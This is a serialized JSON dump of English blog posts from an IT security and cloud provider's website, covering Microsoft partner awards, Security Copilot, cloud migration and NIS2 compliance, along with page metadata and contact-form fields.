performance.",{"title":65,"searchDepth":111,"depth":111,"links":4824},[4825,4826,4827,4828,4829],{"id":4501,"depth":329,"text":4502},{"id":4547,"depth":329,"text":4548},{"id":4653,"depth":329,"text":4654},{"id":4698,"depth":329,"text":4699},{"id":4803,"depth":329,"text":4804},{"lang":2171,"titleClass":2173,"date":4831,"categories":4832,"blogtitlepic":4834,"socialimg":4835,"customExcerpt":4836,"keywords":4837,"hreflang":4838},"2023-05-15",[4833],"Products","head-scepman-revocation","/blog/heads/head-scepman-revocation.jpg","In a Public Key Infrastructure (PKI), it may happen that an issued certificate shall not be valid anymore. There are three techniques to solve this, each with their own advantages and disadvantages: CRLs, OCSP, and Short Lifetime Certificates. This article compares these techniques and illustrates them on the example of the architecture for our product SCEPman.","Certificates, revocations, public key infrastructure, PKI, CRLs, OCSP, short lifetime certificates, Certification Authority, CDPs, LDAP, HTTP, certificate validation, cache, failure, validity, certificate revocation, Content Delivery Network, CDN, Azure Blob Storage, stateless, database, availability, OCSP responder, real-time, ASN.1-. data structure, TLS, HTTPS, availability, deployments, Azure AD, JAMF database, Microsoft Endpoint Manager, Microsoft Intune, JAMF, network connectivity, Let's Encrypt, server certificates, on-premises, data protection, certificate-based authentication, Azure AD, CBA",[4839],{"lang":2260,"href":4840},"/blog/products/2023/05/certificate-revocation","/posts/2023-05-15-certificate-revocation",{"title":4494,"description":65},"posts/2023-05-15-certificate-revocation",[2176,4845,4833,4846],"SCEPman","Certificates","l8bYaidA1PoWKYTf3cw33V5u8FIm5SzMZaYPlPbDq4I",{"id":4849,"title":4850,"author":4851,"body":4852,"cta":2166,"description":4856,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4879,"moment":4880,"navigation":2181,"path":4894,"seo":4895,"stem":4896,"tags":4897,"webcast":2168,"__hash__":4898},"content_en/posts/2023-06-28-partner-of-the-year-accelerate-trust.md","glueckkanja wins Accelerate Trust at the Partner of the Year Awards",[2461],{"type":9,"value":4853,"toc":4877},[4854,4857,4860,4863,4866,4868,4871,4874],[12,4855,4856],{},"As part of Microsoft's global Partner of the Year awards, the Accelerate award is presented to highlight special contributions to the national partner ecosystem. This ecosystem consists of over 30,000 players in Germany alone, including IT service providers, cloud providers, managed service providers, distributors, developers, support service providers and IT professionals of all kinds. The award is given to partners who stand out not only for their impressive sales figures and innovative strength, but also for their outstanding performance in the areas of sustainability, cyber security and corporate culture.",[12,4858,4859],{},"With the successful implementation and management of security platform solutions at leading German energy suppliers, glueckkanja has made a significant contribution to increasing IT security, which in turn has a positive impact on the overall security of supply in Germany. The comprehensive services provided by glueckkanja range from monitoring and incident response to training and support.",[12,4861,4862],{},"Due to these remarkable achievements, glueckkanja was not only the first European partner, but also one of the first three partners worldwide to be awarded the prestigious Microsoft Verified Managed Extended Detection and Response (MXDR) status. The company received additional recognition recently at the RSA conference in San Francisco. Here, the company was voted in the top 5 in the highly competitive Security MSSP of the Year category for the Microsoft Security Excellence Award 2023.",[12,4864,4865],{},"Now, glueckkanja continues its success story and also receives the coveted Partner of the Year Award 2023 in the Accelerate Trust category from Microsoft in Germany, further underlining the company's leading position in the industry.",[3817,4867],{":img":3819,":alt":3820,":cloudinary":3821,"img-src-sets":3822},[12,4869,4870],{},"Christian Kanja, CEO of glueckkanja AG, is pleased about the award and the associated recognition: \"Our comprehensive Managed Detection & Response (MDR) services ensure that overall IT security is continuously monitored and effective defence against cyber threats is guaranteed. We have won the trust and recognition of our customers through continuous efforts to make sustainable improvements. The award now presented by Microsoft impressively proves that we offer effective solutions for cyber security challenges. Microsoft has once again confirmed our determination to continue along the path we have chosen.\"",[12,4872,4873],{},"The Partner of the Year award is presented at Microsoft Inspire 2023. The global partner conference recognises companies from more than 100 countries that have demonstrated excellence in innovation and the development of customer solutions based on Microsoft technologies in a total of 58 categories. glueckkanja is one of these companies and once again shows that German IT companies are capable of scoring on the global stage.",[12,4875,4876],{},"Microsoft Inspire 2023 will take place from 18 to 20 July as a hybrid event. glueckkanja will be present as a Featured Partner with both an on-site stand in Munich and an online session. Another milestone in an exciting year for glueckkanja and proof of the company's top position and innovative strength.",{"title":65,"searchDepth":111,"depth":111,"links":4878},[],{"lang":2171,"titleClass":2173,"date":4880,"categories":4881,"blogtitlepic":4882,"socialimg":4883,"customExcerpt":4884,"keywords":4885,"quote":4886,"hreflang":4889},"2023-06-28",[2962],"head-poy-accelerate-trust","/blog/heads/head-poy-accelerate-trust.jpg","Microsoft has awarded glueckkanja the renowned Accelerate Trust as part of the Partner of the Year Awards. The company scored with the introduction and operation of security platform solutions at leading energy suppliers and makes an important contribution to IT security and thus to supply security in Germany with its services "Made in Germany".","Accelerate Trust, Microsoft Germany, Partner of the Year, Revenue, Innovation, Sustainability, Cyber Security, Corporate Culture, Security Platform Solutions, Utilities, Microsoft Verified Managed Extended Detection and Response (MXDR) Status, Microsoft Security Excellence Award, Managed Detection & Response (MDR) Services, Microsoft Inspire Conference",{"img":4887,"alt":4888},"/blog/pics/quote-edith-wittmann-en.png","Edith Wittmann",[4890,4892],{"lang":2260,"href":4891},"/blog/corporate/award/poy/2023/06/partner-of-the-year-accelerate-trust",{"lang":2263,"href":4893},"/blog/corporate/award/poy/2023/06/test-es","/posts/2023-06-28-partner-of-the-year-accelerate-trust",{"title":4850,"description":4856},"posts/2023-06-28-partner-of-the-year-accelerate-trust",[2972,2973],"HtrC-PViTCPuBGEHod3Pa0QImfYATj4I5wVOQo8Ia9M",{"id":4900,"title":4901,"author":4902,"body":4903,"cta":2166,"description":4907,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4939,"moment":4940,"navigation":2181,"path":4948,"seo":4949,"stem":4950,"tags":4951,"webcast":2168,"__hash__":4953},"content_en/posts/2023-08-09-inspire-2023-review.md","Inspire 2023 in Munich: New start, networking & innovation!",[2415],{"type":9,"value":4904,"toc":4937},[4905,4908,4928,4931,4934],[12,4906,4907],{},"The glueckkanja AG team was back at this year's Inspire2023 in Munich and we were very honoured to receive the Partner of the Year Accelerate Trust Award for our top security discipline - many thanks to Edith Wittmann and Michael Flügge. This award is not only a recognition of our outstanding services, but also a testament to our successful partnership with Microsoft.",[12,4909,4910,4911,805,4916,805,4919,2901,4923,4927],{},"For the first time, we presented ourselves to the Microsoft Partner Community as a product partner. All visitors were able to get a comprehensive overview of our M365 Companions with ",[2672,4912,4915],{"href":4913,"target":4914},"https://www.konnekt.io","_blank","CONNEKT",[2672,4917,4845],{"href":4918,"target":4914},"https://www.scepman.com",[2672,4920,4922],{"href":4921,"target":4914},"https://www.radius-as-a-service.com","RADIUSaaS",[2672,4924,4926],{"href":4925,"target":4914},"https://www.unified-contacts.com","Unified Contacts",". Special thanks go to Stefan Schönleber who, as our Product Marketing & Sales Lead, answered all questions and concerns. The team was very happy to have the support of Andreas Wach and to see Ebru Baumann and Cornelia Heyde again.",[12,4929,4930],{},"For FY24, Microsoft is focusing on AI, Azure Marketplace, EMEA and Corporate Accounts. We thank Lisa, Wael and Oliver for sharing and planning together to reach businesses more comprehensively and quickly with the full Microsoft technology and services stack. Together we have much to achieve!",[12,4932,4933],{},"We would also like to take this opportunity to thank our previous GPS team - Ulrich, Mathias and Chuanlin - for their commitment and look forward to working with Lejla and Kai.",[12,4935,4936],{},"All in all, Inspire 2023 in Munich was not only a place of inspiration and collaboration, but also the start of new partnerships and opportunities for the future. Here's to another successful year!",{"title":65,"searchDepth":111,"depth":111,"links":4938},[],{"lang":2171,"titleClass":2173,"date":4940,"categories":4941,"blogtitlepic":4942,"socialimg":4943,"customExcerpt":4944,"keywords":4945,"hreflang":4946},"2023-08-09",[2962],"head-inspire-2023-review","/blog/heads/head-inspire-2023-review.jpg","The glueckkanja team was once again present at this year's Inspire 2023 in Munich. Honoured with the Partner of the Year Accelerate Trust Award in the area of security and for the first time as a product partner of the Microsoft partner community, our cooperation with Microsoft continues to set new accents.","glueckkanja, Partner of the Year Accelerate Trust Award, Security, Edith Wittmann, Michael Flügge, Microsoft Partnership, Microsoft Partner Community, Product Partners, M365 Companions, KONNEKT, SCEPman, RADIUSaaS, Unified Contacts, Stefan Schönleber, Product Marketing & Sales Lead, Andreas Wach, Ebru Baumann, Cornelia Heyde, Fiscal Year 24, AI, Azure Marketplace, EMEA, Corporate Accounts, Microsoft Technology Stack, Microsoft Service Stack, GPS Team, Ulrich Keller, Mathias Klaas, Chualin Go, Lejla, Kai, Inspire 2023, Munich, Partnerships, Future",{"lang":2260,"href":4947},"/blog/corporate/microsoft/inspire/poy/2023/08/inspire-2023-review","/posts/2023-08-09-inspire-2023-review",{"title":4901,"description":4907},"posts/2023-08-09-inspire-2023-review",[2971,4319,2973,4952],"Inspire","rVx57jgFP1hHQmGyGkS67o9EepI5YifNVQoiQjI3Ils",{"id":4955,"title":4956,"author":4957,"body":4958,"cta":2166,"description":4962,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":4998,"moment":4999,"navigation":2181,"path":5010,"seo":5011,"stem":5012,"tags":5013,"webcast":2168,"__hash__":5015},"content_en/posts/2023-11-15-microsoft-security-copilot-partner.md","glueckkanja is among the first Microsoft Security Copilot partners",[2461],{"type":9,"value":4959,"toc":4995},[4960,4963,4966,4973,4976,4979,4983,4986,4989,4992],[12,4961,4962],{},"glueckkanja announces its exclusive participation in the Microsoft Security Copilot Partner Private Preview—a landmark recognition of its first-class expertise in Microsoft security technologies. Selected for its long-standing experience, innovative mindset, and close, trusted partnership with Microsoft, glueckkanja is at the forefront of exploring groundbreaking security features and providing significant feedback on future-oriented technologies.",[12,4964,4965],{},"\"AI is one of the most defining technologies of our era, holding the potential to achieve significant, fundamental advancements in cybersecurity,\" said Ann Johnson, Corporate Vice President, Microsoft Security Business Development. \"Security is a team sport, and we are thrilled to collaborate with our Security Copilot partner ecosystem to deliver solutions that strengthen cyber defense and make the promise of AI a reality.\"",[12,4967,4968,4969],{},"glueckkanja works with Microsoft product teams to shape the product development of Security Copilot in several areas, including validating and refining new and upcoming scenarios, providing feedback on product development and operations for future product releases, and validating and providing feedback on APIs to support the extensibility of Security Copilot. To learn more, ",[2672,4970,4972],{"href":4971,"target":4914},"https://aka.ms/IgniteFY24SecurityBlogPost","read the announcement.",[12,4974,4975],{},"\"Working with Security Copilot for an analyst is like wearing an exoskeleton. All their abilities and knowledge are suddenly and massively amplified. Dealing with complex contexts becomes easy and can be accomplished in unprecedented time. We at glueckkanja love Security Copilot,\" said Jan Geisbauer, Security Lead at glueckkanja AG.",[12,4977,4978],{},"Security Copilot is the first AI-powered security product that enables security professionals to quickly respond to threats, process signals at machine speed, and assess risk exposure within minutes. It combines an advanced Large Language Model (LLM) with a security-specific model, enriched by Microsoft's unique global cyber threat intelligence and more than 65 trillion daily signals.",[186,4980,4982],{"id":4981},"about-glueckkanja","About glueckkanja",[12,4984,4985],{},"glueckkanja, a renowned Cloud Managed Service Provider, is a top Microsoft partner offering comprehensive cloud solutions. With a unified blueprint approach, glueckkanja uses Infrastructure as Code to migrate and support customer infrastructures in the cloud.",[12,4987,4988],{},"Focusing on the secure and reliable operation of Workplace Solutions, Azure Services, and Security Infrastructures, glueckkanja serves both medium-sized and large enterprises. glueckkanja's Cloud Security Operations Center continuously protects customer infrastructures, capable of combating incidents and enforcing protection strategies. With a 24/7 Incident Response and APT team, glueckkanja ensures customers receive immediate emergency assistance and defense against cyber threats, keeping their infrastructure up to date with the latest security standards.",[12,4990,4991],{},"To ensure a seamless cloud-native Microsoft experience, glueckkanja has developed its own products. These tools enable a fully protected, completely cloud-centric infrastructure. Their product range includes KONNEKT for local work with Office 365 data, RADIUSaaS and SCEPman for serverless secure network authentication, RealmJoin for cloud software distribution, and Unified Contacts for simplified contact search in Microsoft Teams.",[12,4993,4994],{},"glueckkanja was among the first partners globally to receive the Microsoft Verified Managed Extended Detection and Response (MXDR) designation. With a team of nearly 200 experts, glueckkanja was named Microsoft Worldwide Partner of the Year in 2017, 2019, 2020, 2022, and 2023. Since 2019, glueckkanja has consistently topped the ISG Microsoft 365 Germany quadrant. Moreover, with its innovations, glueckkanja is among the TOP 100 companies in Germany, and an impressive rating of 4.8/5 on kununu solidifies its reputation as a leading employer in the SME sector.",{"title":65,"searchDepth":111,"depth":111,"links":4996},[4997],{"id":4981,"depth":329,"text":4982},{"lang":2171,"titleClass":2173,"date":4999,"categories":5000,"blogtitlepic":5001,"socialimg":5002,"customExcerpt":5003,"keywords":5004,"hreflang":5005},"2023-11-15",[2962],"head-security-copilot","/blog/heads/head-security-copilot.jpg","glueckkanja announced today that Microsoft has selected the company for the Microsoft Security Copilot Partner Private Preview. With its expertise in Microsoft security technologies, glueckkanja will help shape this AI-driven security initiative. The company will work closely with Microsoft's product teams to support the product development of Security Copilot in various ways. This collaboration is a significant milestone in glueckkanja's efforts to offer its customers innovative and secure solutions.","Microsoft Security Copilot, AI in Cybersecurity, Cybersecurity Solutions, Microsoft Security Technologies, Security Copilot Development, AI-Powered Security Product, Cyber Threat Response, Global Threat Intelligence, Tech Innovation in Security, Advanced Large Language Model, Microsoft Ignite, Microsoft Copilot Flight Engineers",[5006,5008],{"lang":2171,"href":5007},"/blog/corporate/2023/11/microsoft-security-copilot-partner-en",{"lang":2263,"href":5009},"/blog/corporate/2023/11/microsoft-security-copilot-partner-es","/posts/2023-11-15-microsoft-security-copilot-partner",{"title":4956,"description":4962},"posts/2023-11-15-microsoft-security-copilot-partner",[2962,2176,5014],"Copilot","vtutcZ2OhoJgRTDbGJ_xZd0CcBDXoMB75EcvoA-6B1k",{"id":5017,"title":5018,"author":5019,"body":5020,"cta":2166,"description":5024,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5054,"moment":5055,"navigation":2181,"path":5064,"seo":5065,"stem":5066,"tags":5067,"webcast":2168,"__hash__":5071},"content_en/posts/2023-11-26-cloud-migration.md","Cloud Migration is More Than Just 'Lift and Shift'",[2401],{"type":9,"value":5021,"toc":5049},[5022,5025,5029,5032,5036,5039,5043,5046],[12,5023,5024],{},"Simply relocating servers to the cloud, known as lift-and-shift, is often not the optimal strategy. Rather, it is about adapting services to modern requirements and optimizing them in the course of the migration. Instead of limiting oneself to traditional IaaS solutions such as virtual servers, Platform-as-a-Service (PaaS) solutions should be considered. These make it possible to focus entirely on the operation of applications, as infrastructure operations are no longer required. A good example of this is the migration of databases, which can be scaled and provided more easily in the cloud. The provision of web services such as IIS or Apache servers is also easy and efficient with Azure PaaS solutions. These solutions offer an efficient alternative for meeting the above requirements simply and cost-effectively.",[186,5026,5028],{"id":5027},"databases-in-azure","Databases in Azure",[12,5030,5031],{},"For example, existing on-premises SQL database servers or clusters can be replaced by Azure SQL Database or Azure Managed Instance Services. These cloud services enable simple, globally distributed deployment. They also offer the flexibility to react quickly to growing requirements. This includes both the ability to reduce and increase capacity without having to purchase new, expensive on-premises hardware. However, careful planning is essential for a successful transition. A clear goal must be defined and set together with the customer and the business.",[186,5033,5035],{"id":5034},"web-services-in-azure","Web Services in Azure",[12,5037,5038],{},"In Azure Web Services, web applications and container solutions can be implemented without the need for a virtual machine (VM) with Apache, IIS or similar systems, as was previously the case. This significantly reduces maintenance costs. In addition, the numerous functions of these cloud services simplify processes such as release management. A good example of this is the deployment slots, which offer new possibilities for release management.",[186,5040,5042],{"id":5041},"container-solutions-in-azure","Container Solutions in Azure",[12,5044,5045],{},"In order to implement complex application scenarios, it is not absolutely necessary to use a large number of virtual machines (VMs) or individual VMs with many services. Container solutions, some of which are offered directly by manufacturers in the Azure Marketplace, offer a flexible and reliable alternative. These solutions do not necessarily require a dedicated Kubernetes cluster, which is often too large for the actual use case. Azure provides various services as required, such as Azure Container Apps or Azure Container Instances. These allow customers to gain initial experience with container solutions. As demand increases, consideration can later be given to setting up their own Kubernetes instance.",[12,5047,5048],{},"Cloud migration goes far beyond the simple lift-and-shift approach. It is about strategic adjustments and the use of advanced cloud solutions to optimize business processes. What is your experience with cloud migration? For further discussion or to learn how cloud technologies can transform your business processes, please contact us. We look forward to discussing various options and strategies with you.",{"title":65,"searchDepth":111,"depth":111,"links":5050},[5051,5052,5053],{"id":5027,"depth":329,"text":5028},{"id":5034,"depth":329,"text":5035},{"id":5041,"depth":329,"text":5042},{"lang":2171,"titleClass":2173,"date":5055,"categories":5056,"blogtitlepic":5057,"socialimg":5058,"customExcerpt":5059,"keywords":5060,"hreflang":5061},"2023-11-26",[4232],"head-cloud-migration","/blog/heads/head-cloud-migration.jpg","Companies decide to migrate to the cloud for various reasons. A common motivation is the strategic alignment of the company to preferably deploy workloads in the cloud in the future. Another reason can be the limited space or outdated infrastructure in traditional on-premises data centers. Cloud migration becomes particularly attractive when it involves the rapid and global integration of new services. This is where the strength of the Microsoft Cloud becomes evident, offering extensive resources and services that would only be feasible on-premises with considerable effort and cost.","Cloud Migration, Azure Solutions, IT Infrastructure, Cloud Strategy, Lift and Shift, PaaS, IaaS, Azure SQL Database, Azure Managed Instance, Container Solutions, Azure Web Services, Release Management, Kubernetes, Scalability, On-Prem to Cloud, Cloud Integration, Cloud Optimization, Database Migration, Web Service Migration, Cloud Infrastructure",[5062],{"lang":2260,"href":5063},"/blog/azure/infrastruktur/cloud/2023/11/cloud-migration","/posts/2023-11-26-cloud-migration",{"title":5018,"description":5024},"posts/2023-11-26-cloud-migration",[4232,5068,5069,5070,3661],"IaaS","PaaS","Infrastructure","10WKIwP4UTcRMhw-o3t-RdZnd1qGBC53fBTTtiVWA6w",{"id":5073,"title":5074,"author":5075,"body":5076,"cta":2166,"description":5080,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5092,"moment":5093,"navigation":2181,"path":5109,"seo":5110,"stem":5111,"tags":5112,"webcast":2168,"__hash__":5114},"content_en/posts/2024-03-13-mssp-2024.md","After the Oscars, it's time for the MSSP!",[2461],{"type":9,"value":5077,"toc":5090},[5078,5081,5084,5087],[12,5079,5080],{},"The Microsoft Security Service Provider (MSSP) Award is recognized as one of the most significant accolades within the vital domain of cybersecurity. This year marks the fifth instance of honoring Microsoft Partners for their exceptional contributions and achievements in cyber security. What distinguishes the MSSP Award as particularly unique is the fact that all finalists are members of the Microsoft Intelligent Security Association (MISA) and are Managed Security Service Providers that have incorporated their security solutions within Microsoft's security technology. Securing a spot on the shortlist signifies triumph over a global array of industry leaders, positioning these finalists among the elite in the security sector.",[5082,5083],"quotes",{":quotes":5082},[12,5085,5086],{},"Employees of Microsoft and MISA-affiliated companies have until March 22, 2024, to cast their votes for their preferred candidates on the shortlist. The Microsoft Security Excellence Awards ceremony, introducing new categories this year, is scheduled for May 6, 2024, during the RSA Conference, held not too far from Hollywood, in San Francisco.",[12,5088,5089],{},"In additional positive news, we are pleased to announce the results of our CSOC Customer Poll 2023. An overwhelming 100 percent of respondents expressed their satisfaction with the resources provided by our CSOC to meet their security requirements, with 87 percent also very satisfied with the expertise of our team. This feedback is particularly gratifying for us, as it comes directly from those we strive to serve every day: our clients.",{"title":65,"searchDepth":111,"depth":111,"links":5091},[],{"lang":2171,"titleClass":2173,"date":5093,"categories":5094,"blogtitlepic":5095,"socialimg":5096,"customExcerpt":5097,"keywords":5098,"hreflang":5099,"quotes":5104},"2024-03-13",[2962],"head-finalist-mssp","/blog/heads/head-finalist-mssp.png","glueckkanja finds itself once again on the shortlist for the 2024 MSSP of the Year Awards! Fresh off applauding Christopher Nolan, Cillian Murphy, Emma Stone, and the blockbuster Oppenheimer in L.A., we have another reason for genuine award excitement: We, at glueckkanja, are finalists for the Security MSSP of the Year Award 2024!","MSSP, MSSP of the Year Awards 2024, Security MSSP, Cyber Security, Microsoft Partner, MISA, Managed Security Service Providers, Microsoft Security Technology, Shortlist, Security Excellence Awards, RSA Conference, San Francisco, CSOC Customer Poll 2023, Security Requirements, Expertise",[5100,5102],{"lang":2260,"href":5101},"/blog/corporate/2024/03/mssp-2024",{"lang":2263,"href":5103},"/blog/corporate/2024/03/mssp-2024-es",{"items":5105},[5106],{"text":5107,"name":2209,"company":5108,"img":2207,"alt":2209},"Our employees are the cornerstone of our success. Customers value the technical expertise and personal interaction with our staff, which fosters long-term loyalty to our service. Microsoft has recognized this blend of proficiency and passion for innovation for the second consecutive year, a distinction that fills us with immense pride.","Security Lead","/posts/2024-03-13-mssp-2024",{"title":5074,"description":5080},"posts/2024-03-13-mssp-2024",[2972,2971,2176,5113],"Misa","R-eypOzBbW89TQqmOab23QmqTgZV14U7OVnWtjOuRdY",{"id":5116,"title":5117,"author":5118,"body":5119,"cta":2166,"description":5123,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5249,"moment":5251,"navigation":2181,"path":5294,"seo":5295,"stem":5296,"tags":5297,"webcast":2168,"__hash__":5301},"content_en/posts/2024-04-21-nis2.md","Are you ready for NIS2?",[2209],{"type":9,"value":5120,"toc":5243},[5121,5124,5127,5131,5133,5136,5155,5158,5161,5165,5167,5170,5184,5190,5194,5196,5199,5202,5205,5219,5223,5225,5228,5231],[12,5122,5123],{},"Bad news first: the updated version of the EU Network and Information Security Directive (NIS2 Directive) must be implemented by EU member states by October 17, 2024. Your company should comply with the numerous requirements of NIS2 by then at the latest - otherwise you could face hefty fines. Also, the management will be personally liable for violations of the directive.",[12,5125,5126],{},"The good news: If you are already using security solutions from Microsoft, you and your company may not be missing much to meet the complex requirements. But first things first.",[41,5128,5130],{"id":5129},"what-is-nis2-all-about","What is NIS2 all about?",[12,5132,31],{},[12,5134,5135],{},"Every year, data security incidents cause massive economic damage. Attacks on companies are becoming more frequent, more complex and therefore more dangerous. At the same time, networks are becoming more vulnerable in view of remote working and business activities in an increasingly connected world. This is where NIS2 comes in.",[5137,5138,420,5139,420,5144,420,5148,420,5152],"picture",{},[5140,5141],"source",{"media":5142,"srcSet":5143},"(min-width: 992px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-statistics-en.png",[5140,5145],{"media":5146,"srcSet":5147},"(min-width: 768px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-statistics-mobile-en.png",[5140,5149],{"media":5150,"srcSet":5151},"(min-width: 576px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-statistics-mobile-en.png",[2642,5153],{"src":5151,"alt":5154},"Statistics on data security incidents in Germany",[12,5156,5157],{},"The aim of the European directive is to harmonize the requirements for modern cybersecurity and its enforcement in the EU member states by setting a benchmark for minimum measures that companies must meet. NIS2 will thus be the most comprehensive European cybersecurity directive, covering 18 sectors.",[12,5159,5160],{},"Each country must transpose the directive into national law by October 2024, leaving room for national specifics. However, there are some minimum requirements that must be implemented in any case. As many countries currently (as of April 21, 2024) have no official draft legislation for the implementation of NIS2, it is not exactly easy for companies to prepare for the new directive. However, some important questions can already be answered.",[41,5162,5164],{"id":5163},"is-nis2-relevant-for-you","Is NIS2 relevant for you?",[12,5166,31],{},[12,5168,5169],{},"First of all, you should make sure that the NIS2 directive applies to you and your organization. This check does not happen automatically but must be carried out independently by companies. NIS2 divides companies into \"essential\" and \"important\" categories, some of which differ in terms of requirements. Also, the size and turnover of each organization plays a role in defining which criteria apply. This affects 18 sectors in total:",[5137,5171,420,5172,420,5175,420,5178,420,5181],{},[5140,5173],{"media":5142,"srcSet":5174},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-sectors-en.png",[5140,5176],{"media":5146,"srcSet":5177},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-sectors-mobile-en.png",[5140,5179],{"media":5150,"srcSet":5180},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-sectors-mobile-en.png",[2642,5182],{"src":5180,"alt":5183},"Sectors affected by the NIS2 Directive",[12,5185,5186,5189],{},[251,5187,5188],{},"Please note:"," NIS2 affects the entire supply chain of a company. Therefore, the directive may apply to you even if you do not meet the respective criteria but are part of the supply chain of a company affected by NIS2.",[41,5191,5193],{"id":5192},"what-are-the-requirements-of-nis2","What are the requirements of NIS2?",[12,5195,31],{},[12,5197,5198],{},"NIS2 builds on previous legislation such as NIS1 and GDPR but adds numerous new requirements. The details of these new requirements will not be clear until a final draft of the legislation is published, but companies can already make comprehensive preparations now.",[12,5200,5201],{},"This is because NIS2 compliance is aligned with the same Zero Trust principles that Microsoft security solutions already take into account in order to provide solid protection against cyberattacks across the entire attack surface.",[12,5203,5204],{},"The policy is based on a number of principles that can be ensured either with Microsoft solutions or our services and products. We have summarized the most important principles here:",[5137,5206,420,5207,420,5210,420,5213,420,5216],{},[5140,5208],{"media":5142,"srcSet":5209},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-principles-en.png",[5140,5211],{"media":5146,"srcSet":5212},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-principles-mobile-en.png",[5140,5214],{"media":5150,"srcSet":5215},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-principles-mobile-en.png",[2642,5217],{"src":5215,"alt":5218},"NIS2 principles that can be fulfilled with Microsoft solutions or our products",[41,5220,5222],{"id":5221},"what-can-companies-do-now","What can companies do now?",[12,5224,31],{},[12,5226,5227],{},"With October approaching and the draft legislation still pending in many countries, it may be tempting for companies to speculate on possible grace periods from the government. However, the switch to NSI2-compliant systems can have potentially far-reaching consequences which need to be thoroughly planned, especially for organizations still working with legacy solutions.",[12,5229,5230],{},"Our clear recommendation is therefore not to wait any longer and to act now. Even before the NIS2 directive comes into effect, your organization will benefit from a solid risk management strategy, timely incident reporting, the ability to audit the supply chain and maintain a complete inventory of all digital assets.",[12,5232,5233,5234,5238,5239,5242],{},"We can support you not only in ",[2672,5235,5237],{"href":5236},"/en/security/security-consulting/","managing existing Microsoft security solutions",", but also in setting up additional protection mechanisms. Our specialized ",[2672,5240,3696],{"href":5241},"/en/security/cloud-security-operations-center/",", which is closely integrated with Microsoft security technologies, makes it possible to efficiently monitor and evaluate alerts, distinguish real threats from false positives and thus ensure comprehensive protection against digital threats. By integrating additional data sources (non-Microsoft data sources) and using advanced tools such as Microsoft Sentinel, we offer standardized security solutions that are precisely tailored to the specific needs of each customer.",{"title":65,"searchDepth":111,"depth":111,"links":5244},[5245,5246,5247,5248],{"id":5129,"depth":111,"text":5130},{"id":5163,"depth":111,"text":5164},{"id":5192,"depth":111,"text":5193},{"id":5221,"depth":111,"text":5222},{"lang":2171,"seoTitle":5250,"titleClass":2173,"date":5251,"categories":5252,"blogtitlepic":5253,"socialimg":5254,"customExcerpt":5255,"keywords":5256,"hreflang":5257,"scripts":5260,"contactInContent":5261},"NIS2 Directive 2024: Everything you need to know at a glance","2024-04-21",[2176],"head-nis2-en","/blog/heads/head-nis2-en.png","The new NIS2 directive places a whole range of requirements on companies and their cyber security - from minimum measures for cryptography and security procedures for data access to plans for dealing with security incidents. We provide you with an overview and answer the most important questions.","NIS2 directive, cybersecurity, EU directive implementation, network and information security, KRITIS operators, Microsoft security solutions, data security, compliance, cyberattacks, zero trust principles",[5258],{"lang":2260,"href":5259},"/blog/security/2024/04/nis2",{"slick":2181,"form":2181},{"quote":2181,"infos":5262},{"headline":5263,"subline":5264,"level":41,"textStyling":2204,"flush":2205,"person":5265,"form":5280},"Get in touch with us","Do you still have questions? We will be happy to help you get your company ready for the NIS2 directive.",{"image":2207,"mail":5266,"number":5267,"cloudinary":2181,"alt":2209,"name":2209,"quotee":2209,"quoteeTitle":5108,"quote":5268,"detailsHeader":5269,"details":5270},"sales@glueckkanja.com","+49694005520","NIS2 enhances security within EU enterprises. Ideally, cybersecurity should be strengthened out of conviction rather than merely compliance with regulations. Microsoft Security provides top-tier security solutions, and glueckkanja is your leading service provider in this field. We are here to assist you.","We look forward to hearing from you!",[5271,5276],{"text":5272,"href":5273,"details":5274,"icon":5275},"+49 69 4005520","tel:+49 69 4005520","Call now","site/phone",{"text":5277,"href":5278,"icon":5279},"info@glueckkanja.com","mailto:info@glueckkanja.com","site/mail",{"ctaText":5281,"cta":5282,"method":2169,"action":2216,"fields":5283},"Send",{"skin":2215},[5284,5285,5286,5287,5289,5291,5293],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":5288,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored by us to process and respond to your request. Further information on data protection can be found in our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2241,"id":2247,"value":5290},"Anfrage NIS2 Beratung",{"type":2241,"id":2250,"value":5292},"nis2-consulting",{"type":2241,"id":2253},"/posts/2024-04-21-nis2",{"title":5117,"description":5123},"posts/2024-04-21-nis2",[5298,2176,5299,5300],"NIS2","EU Directive","Zero Trust","4p4d8CwsoJw8x7Nd0B758_Sj_G1Z4gbBfedhBQhbIjY",{"id":5303,"title":5304,"author":5305,"body":5306,"cta":2166,"description":5310,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5497,"moment":5499,"navigation":2181,"path":5509,"seo":5510,"stem":5511,"tags":5512,"webcast":2168,"__hash__":5513},"content_en/posts/2024-04-25-isg.md","ISG once again honors glueckkanja",[2461],{"type":9,"value":5307,"toc":5490},[5308,5311,5315,5317,5320,5323,5326,5330,5332,5338,5341,5371,5375,5377,5383,5386,5406,5410,5412,5418,5421,5455,5459,5461,5467,5470],[12,5309,5310],{},"As a long-standing Microsoft partner, glueckkanja supports enterprises with comprehensive cloud solutions. As a leading IT service provider, it serves over 1,000 customers worldwide with its expertise — the experience and willingness to innovate make 